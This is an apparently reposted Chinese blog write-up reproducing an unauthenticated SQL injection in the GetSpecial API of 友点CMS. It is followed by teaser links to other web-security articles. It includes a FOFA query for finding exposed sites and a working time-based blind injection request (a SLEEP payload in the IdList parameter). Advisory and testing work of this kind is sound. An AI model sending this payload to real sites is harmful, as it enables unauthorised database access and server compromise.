友点CMS GetSpecial SQL注入漏洞复现

8月前作者：OidBoy_G 分类：Toy博客阅读(33) 违法举报

这篇具有很好参考价值的文章主要介绍了友点CMS GetSpecial SQL注入漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

0x01 产品简介

友点CMS是一款高效且灵活的网站管理系统，它为用户提供了简单易用的界面和丰富的功能。无论是企业还是个人，都能通过友点CMS快速搭建出专业且美观的网站。该系统支持多种内容类型和自定义模板，方便用户按需调整。同时，它具备强大的SEO功能，能提升网站在搜索引擎中的排名。友点CMS还支持多语言设置，适应国际化需求。总的来说，友点CMS是网站建设的理想选择，既高效又易用。

0x02 漏洞概述

友点CMS建站系统GetSpecial 接口处存在SQL注入漏洞，未经身份认证的攻击者可以利用该漏洞获取系统数据库敏感信息，深入利用可获取服务器权限。

0x03 复现环境

FOFA：app="友点建站-CMS"

友点CMS GetSpecial SQL注入漏洞复现,漏洞复现,安全,web安全

0x04 漏洞复现

PoC文章来源地址https://www.toymoban.com/news/detail-830886.html

GET /index.php/api/GetSpecial?debug=1&ChannelID=1&IdList=1,1%29%20and%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29A HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWeb

到了这里，关于友点CMS GetSpecial SQL注入漏洞复现的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

Web安全：SQL注入漏洞测试.

SQL注入就是有些恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中，同时程序的本身对用户输入的内容过于相信，没有对用户插入的SQL语句进行任何的过滤，从而直接被SQL语句直接被服务端执行，导致数据库的原有信息泄露，篡改，甚至被删除等风险。 SQL注

2024年02月05日
浏览(46)
Web安全：SQL注入漏洞测试（防止黑客利用此漏洞.）

SQL注入就是有些恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中，同时程序的本身对用户输入的内容过于相信，没有对用户插入的SQL语句进行任何的过滤，从而直接被SQL语句直接被服务端执行，导致数据库的原有信息泄露，篡改，甚至被删除等风险。 SQL注

2024年02月13日
浏览(32)
web安全漏洞-SQL注入攻击实验

实验目的学习sql显注的漏洞判断原理掌握sqlmap工具的使用分析SQL注入漏洞的成因实验工具 sqlmap是用python写的开源的测试框架，支持MySQL，Oracle，PostgreSQL，Microsoft SQL Server，Microsoft Access，IBM DB2，SQLite，Firebird，Sybase，SAP，MAXDB并支持6种SQL注入手段。实验内容 SQL注入（SQL I

2024年02月06日
浏览(46)
Web安全 SQL注入漏洞测试.（可以防止恶意用户利用漏洞）

SQL注入就是有些恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中，同时程序的本身对用户输入的内容过于相信，没有对用户插入的SQL语句进行任何的过滤，从而直接被SQL语句直接被服务端执行，导致数据库的原有信息泄露，篡改，甚至被删除等风险。 SQL注

2023年04月20日
浏览(40)
WEB安全之XSS漏洞与SQL注入漏洞介绍及解决方案

这篇文章把Xss跨站攻击和sql注入的相关知识整理了下，比较适合初学者观看。对于防止sql注入发生，我在这里用简单拼接字符串的注入及参数化查询，如果大家对这个系列的内容感兴趣，可以在评论区告诉我！ XSS又叫CSS (Cross Site Script) ，跨站脚本攻击。它指的是恶意攻击者

2024年02月07日
浏览(43)
常见web安全漏洞-暴力破解，xss，SQL注入，csrf

1，暴力破解原理：使用大量的认证信息在认证接口进行登录认证，知道正确为止。为提高效率一般使用带有字典的工具自动化操作基于表单的暴力破解 --- 若用户没有安全认证，直接进行抓包破解。验证码绕过 on s

2023年04月12日
浏览(46)
金山终端安全系统V9.0 update_software_info_v2.php处SQL注入漏洞复现 [附POC]

免责声明：请勿利用文章内的相关

2024年02月03日
浏览(54)
小迪安全25WEB 攻防-通用漏洞&SQL 读写注入&MYSQL&MSSQL&PostgreSQL

#知识点： 1、SQL 注入-MYSQL 数据库 2、SQL 注入-MSSQL(SQL server) 数据库 3、SQL 注入-PostgreSQL 数据库 #详细点： Access 无高权限注入点-只能猜解，还是暴力猜解因为access的数据库是独立存在的，不存在统一管理对账号密码进行猜解，此时只是获取到后台的操

2024年02月20日
浏览(53)
红帆OA SQL注入漏洞复现

红帆iOffice.net从最早满足医院行政办公需求（传统OA），到目前融合了卫生主管部门的管理规范和众多行业特色应用，是目前唯一定位于解决医院综合业务管理的软件，是最符合医院行业特点的医院综合业务管理平台，是成功案例最多的医院综合业务管理软件。红帆

2024年02月12日
浏览(74)
SQL注入漏洞复现：探索不同类型的注入攻击方法

这篇文章旨在用于网络安全学习，请勿进行任何非法行为，否则后果自负。准备环境 sqlilabs靶场安装：Sqli-labs靶场搭建（适合新手小白围观）_sqlilabs靶场搭建-CSDN博客注入讲解介绍基于错误的注入（Error-based Injection）是一种利用应用程序返回的错误信息来

2024年02月11日
浏览(39)